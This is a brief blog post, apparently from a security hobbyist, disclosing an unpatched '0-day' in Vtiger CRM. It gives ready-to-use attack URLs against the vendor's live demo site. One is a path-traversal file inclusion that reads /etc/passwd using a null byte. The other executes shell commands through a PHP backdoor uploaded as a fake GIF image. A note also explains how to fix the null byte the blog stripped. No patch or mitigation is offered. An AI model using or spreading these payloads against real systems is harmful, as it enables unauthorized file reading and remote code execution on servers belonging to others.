« Home | The real reason... » | Defcon in the Philippines » | Free mobile yahoo » | New version of metasploit released » | Dotproject Exploit ( 0day ) » | Pangasinan State University's Xsystem 2007 » | HSBC Security Device » | WabiSabiLabi founder arrested for alleged spying » | Increasing demand for cybersecurity pros in RP seen » | IMX / Nextel »

Vtiger CRM Exploit ( 0-day )

Vtiger CRM is 100% Open Source Customer Relationship Management solution built over LAMP/WAMP stack and other third-party open source packages. I made a quick run-through on their demo site and discovered some stuff.You need to be authenticated first.

LFI

http://en.vtiger.com/index.php?action=../../../../../../../../etc/passwd% 00&module=Home

Command Execution

First, upload a php backdoor disguised as a valid picture file. And then...

http://en.vtiger.com/index.php?cmd=uname%20-a;id;pwd&action=../../storage/2008/February/
week1/31361_kidlat.gif% 00&module=Home

I did not install the software and I stopped when I reached this point so I wasn't able to find all the bugs =)

[there sould be no space between % and 00 in the url, can't post it as such here coz blogger's stripping them out]